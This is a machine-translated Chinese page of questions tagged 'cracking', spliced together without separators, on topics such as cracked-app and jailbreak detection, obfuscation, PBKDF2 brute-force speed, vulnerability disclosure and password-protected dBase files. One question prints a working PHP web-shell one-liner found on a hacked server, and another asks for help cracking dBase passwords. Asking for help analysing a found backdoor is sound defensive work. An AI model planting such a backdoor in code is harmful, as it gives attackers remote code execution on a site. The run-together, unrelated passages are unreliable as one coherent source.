标签: cracking

我正在为破解的iPhone应用程序构建黑名单服务,如果我错过了检测破解应用程序的方法,我很好奇.

在下面的应用程序裂缝检测方法可用于该服务:

1. 检查plist大小
2. 检查签名者身份
3. 检查二进制文件是否被加密(不确定这是否正常,因为没有以这种方式检测到破解的应用程序)
4. 检查修改日期的info.plist针对包的修改日期(不知道这是工作-使用如下代码:http://snippie.net/snip/f7530ff2做到这一点)

我也想知道是否有可能检查设备是否已越狱？这也有帮助,因为该服务将像垃圾邮件黑名单一样工作,越狱可用于提高分数.

我还包括一个蜜罐,它告诉我,破解者使用的工具消除了我做的一些检查.例如,plist检查大小或签名者身份.

我现在的问题是:

• 我应该使用更多"好"的支票吗？

和

• 有没有办法检测越狱？

谢谢你的帮助!

问题是我的互联网连接很慢,而且视频没有像YouTube一样缓冲.因此我想知道天气我可以提取.flv文件的URL,该文件正在JW Player中流式传输并直接下载.做一些初步研究,我发现了以下信息:

• 主要视频网址:http://ijf10.ilcannocchiale.tv/video/2263
• 仅链接到视频:http://ijf10.ilcannocchiale.tv/js/mediaplayer.swf？...
• XML文件:http://ijf10.ilcannocchiale.tv/xml/video/2263
• 实际文件名: 20100425_mother.flv

我正在制作一个具有客户端和服务器端的商业产品.客户端完全依赖于服务器,只是为了让它更难破解/盗版.问题是,即便如此,有人可能会对协议进行反向工程并制作自己的服务器.

我已经考虑过使用ssl或其他算法加密连接,因此通过嗅探客户端和服务器之间的流量来找出协议就不那么​​容易了.

现在,我唯一可以想到的是盗版者会使用的是反编译程序,删除加密并尝试查看"纯文本"协议以便对其进行反向工程.

我已经阅读过以前的主题,我知道不可能破解,但是程序员可以对我们的代码进行哪些调整以使其成为破解者的头疼问题？

在密码哈希泄漏之后,我一直在查看我们的密码哈希.我们使用的是使用PBKDF2的Django 1.4,它很棒,比之前的SHA1更上一层楼.

但是我很好奇,人们可以轻易地蛮力.我正在查看我们的密码复杂性规则,并且想知道(例如)8个长度小写的ascii字母需要多快.

这个破解LinkedIn密码哈希的指南,有人在GPU上每秒执行4.3亿次sha1哈希.http://erratasec.blogspot.ie/2012/06/linkedin-vs-password-cracking.html你会为PBKDF2获得什么样的速度？

有没有人有任何粗糙/背后的信封/球场数据表明人们可以用多快的速度强行推出PBKDF2？

假设您最近在几个主要在您所在国家/地区激活且在其市场中非常强大的网站中发现了一些主要漏洞.我正在谈论的漏洞比让我使用超级管理员权限浏览管理界面更糟糕.

你现在会做什么？我想的是:

1. 向公司报告问题.
2. 公开宣布这些应用程序中存在安全漏洞,但未披露实际漏洞.
3. 让公司有时间解决问题.(多少？)
4. 问题解决后,或修复的宽限期已过(以先到者为准),请充分披露漏洞.

你们有什么感想？您是否有一些材料可以阅读或分享经验？

我正在寻找软件保护和/或代码混淆软件,如Oreans Themida,VSProtect,ASPRotect等.然而,反病毒误报对我来说是一个交易破坏者.我不能给我们的合法用户带来不便或吓跑.不幸的是,上面提到的三种产品似乎都遇到了这个问题.

我用Delphi编写的32位本机(非.NET)Windows应用程序现在使用自定义许可证管理代码,并且运行良好,但由于不使用代码混淆,因此每次发布后数小时内都会产生裂缝.所以,我正在寻找一种产品,它至少可以增加一定程度的防范程序,并且不会产生反病毒的假阳性.

我的首要任务是在我的软件中引入非躲避和稳定性,缺少错误和防病毒误报.防裂保护水平是次要的.

对于我的应用程序的付费版本,我选择了解锁程序应用程序路由,因为它易于实现,允许开发人员控制台中的各个统计信息,但主要是因为我不需要维护2个代码库(一个用于免费版本和另一个付费版本).即使我使用CVS(我这样做),仍然需要保持合并功能和错误修复.解锁器应用程序更容易实现整体...

但这有一个严重的缺点,它很容易超出安全检查; 除非我在这里遗漏了什么.

无论我做什么,这样的实现总会导致一个简单的if,像这样:

if(Program.isPremiumVersion()) {
    // Remove ads...
}

该isPremiumVersion()方法负责检查付费解锁器应用程序安装的所有工作,如果证书匹配和所有这些东西.是的,解锁器应用程序受LVL保护(虽然我已经阅读了一些提到LVL不安全的文章,但现在不是重点).但最终,无论内部代码有多复杂isPremiumVersion(),它总会导致返回一个true或false值.

覆盖这样的安全功能只需要对代码进行逆向工程并使其始终返回true.不是吗？我们如何保护我们的Android应用免受此攻击？是的,代码使用ProGuard进行混淆.不过,对于足够熟练的人来说,不应该太难.

请注意,我不是在试图打击破解者,我们根本无法获胜.我不会为此而失眠,在"完美解决方案"上浪费了无数个小时.我只是在寻找一种让它更安全的方法.至少在理论上,这似乎很容易破解.我错了吗？

有什么想法可以提高这种功能的安全性吗？

我在我的一个PHP文件中找到了黑客留下的一行脚本.它读起来像这样:

<?php

($_=@$_GET[2]).@$_($_POST[1]);

?>

任何人都可以提供一些关于这行代码的提示吗？谢谢

如果我在PostgreSQL中有一个带有绝密数据数据库的服务器,我的密码实际上是不可能猜到的(手工生成的各种奇怪字符的128个字符串).服务器密码实际上也是不可思议的.

除了密码猜测之外,从这个数据库中获取数据有多容易？

假设:

1. 服务器上只存在DB.PHP脚本中没有密码或类似的东西
2. 窃取服务器的人是服务器/ DB /硬盘恢复专家
3. 我没有使用任何硬盘加密或任何超出常规的保护
4. 我正在使用Ubuntu Hardy(最新稳定版)

我试图了解有人获得对我服务器硬盘的物理访问所涉及的风险.

我从遗留应用程序继承了一堆dBase(.dbf)文件,我需要将数据导入MS SQL或MS Access.我知道这些程序内置了"导入"功能,但dBase文件受密码保护,这里的人似乎都不知道.

有人知道密码或破解密码吗？

(编辑:添加了C#tag bc,这是我可能用于任何程序化解决方案的语言)

赏金奖励:我还没有一个很好的解决方案,但是只有2个小时才能获得赏金,所以我想我应该把它奖励给目前为止最有用的答案.在这方面,我认为75美元的付费解决方案可能是最节省时间和最节能的,即使它不能让我自己解决它的智力满足感!:)

我将在此期间留下"未答复"的问题,直到我看到任何解决方案是否真的有效......